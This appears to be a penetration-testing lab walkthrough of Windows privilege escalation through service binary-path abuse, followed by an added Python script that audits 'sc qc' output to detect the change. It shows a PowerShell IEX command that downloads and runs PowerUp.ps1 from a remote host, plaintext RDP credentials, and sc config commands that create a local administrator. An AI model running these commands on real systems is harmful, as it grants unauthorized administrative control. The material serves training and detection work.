Remote login with rdesktop:
proxychains4 rdesktop -u nina -p Passw0rd! 172.16.243.183
The following error appears:
Core(error): tcp_send(), gnutls_record_send() failed with -53: Error in the push function.
Disconnected due to network error, exiting...
disconnect: Unknown reason.
Switch to xfreerdp:
proxychains4 xfreerdp /u:nina /p:Passw0rd! /v:172.16.243.183
Use PowerUp to look for possible privilege-escalation weaknesses: https://michmich.eu/Cheatsheets/internal/03-lpe-windows/
C:\Users\nina\Desktop>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\nina\Desktop> **IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/PowerUp.ps1'))**
PS C:\Users\nina\Desktop> **Invoke-AllChecks
[*] Checking service permissions...
ServiceName : SNMPTRAP
Path : C:\Windows\System32\snmptrap.exe
StartName : NT AUTHORITY\LocalService
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart : True**
PS C:\Users\nina\Desktop> Invoke-ServiceAbuse -Name 'SNMPTRAP'
ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+ Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
ServiceAbused Command
------------- -------
**SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add**
C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 4 DISABLED**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\Users\nina\Desktop>sc config "SNMPTRAP" binPath="cmd.exe /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS
C:\Users\nina\Desktop>sc stop "SNMPTRAP"
[SC] ControlService FAILED 1062:
The service has not been started.
C:\Users\nina\Desktop>sc start "SNMPTRAP"
[SC] StartService FAILED 1058:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
C:\Users\nina\Desktop>
C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\Users\nina\Desktop>sc config "SNMPTRAP" binpath= "cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS
C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 4 DISABLED**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\Users\nina\Desktop>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS
C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 2 AUTO_START**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\Users\nina\Desktop>sc start SNMPTRAP
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Review of the privilege-escalation part:
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
**START_TYPE : 4 DISABLED // this has to be changed to auto, otherwise the PowerUp privilege escalation throws an error**
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
Let's look at the result without changing it:
PS C:\Users\nina\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**
*ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+ Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException*
ServiceAbused Command
------------- -------
SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add
PS C:\Users\nina\Desktop> net users
User accounts for \\JUMP03
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
The command completed successfully.
As you can see, Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'
throws an error, and the user is not added.
Change START_TYPE to auto:
C:\Users\nina>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS
C:\Users\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SNMPTRAP
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\snmptrap.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
As you can see, Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'
now runs without an error, but adding the user still fails.
PS C:\Users\nina\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**
ServiceAbused Command
------------- -------
SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add
PS C:\Users\nina\Desktop> net users
User accounts for \\JUMP03
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
The command completed successfully.
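As an added defender-side example (not code from this write-up or from PowerUp), the following Python parses `sc qc` output in the layout shown above and flags the two changes the log makes visible: a BINARY_PATH_NAME that is a shell command chain rather than a service executable, and a start type flipped between two captures. The sample blocks are the `sc qc SNMPTRAP` captures from this page, abridged to the fields the audit uses.

```python
import re

# Defender-side heuristics (added example, not code from the write-up above).
# A legitimate service binary is a path to an executable; a shell command
# chain such as "cmd /c net user ... && net localgroup ..." is not.
SHELL_MARKERS = ("cmd /c", "cmd.exe", "powershell", "&&", "net user", "net localgroup")

# Sample input: the `sc qc SNMPTRAP` captures from the write-up, abridged to
# the fields the audit uses (before and after the binPath/start-type changes).
SC_QC_ORIGINAL = r"""
SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 4   DISABLED
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        SERVICE_START_NAME : NT AUTHORITY\LocalService
"""
SC_QC_MODIFIED = r"""
SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
        SERVICE_START_NAME : NT AUTHORITY\LocalService
"""

def parse_sc_qc(text):
    """Parse the KEY : value block printed by `sc qc <service>` into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = " ".join(m.group(2).split())  # collapse column padding
    return fields

def audit_service(text):
    """Return findings for one capture; an empty list means it looks like a normal service."""
    path = parse_sc_qc(text).get("BINARY_PATH_NAME", "")
    if any(marker in path.lower() for marker in SHELL_MARKERS):
        return ["BINARY_PATH_NAME is a command line, not a service executable: " + path]
    if not re.search(r'\.exe("|\s|$)', path.lower()):
        return ["BINARY_PATH_NAME does not point at an executable: " + path]
    return []

def diff_snapshots(before, after):
    """Fields whose value changed between two captures (here the start type and binary path)."""
    b, a = parse_sc_qc(before), parse_sc_qc(after)
    return {k: (b.get(k), a.get(k)) for k in sorted(set(b) | set(a)) if b.get(k) != a.get(k)}
```

On a live host the same checks map to the System log: event 7040 records the start-type change made by `sc config ... start=auto`, and a periodic `sc qc` baseline diff catches the binPath rewrite.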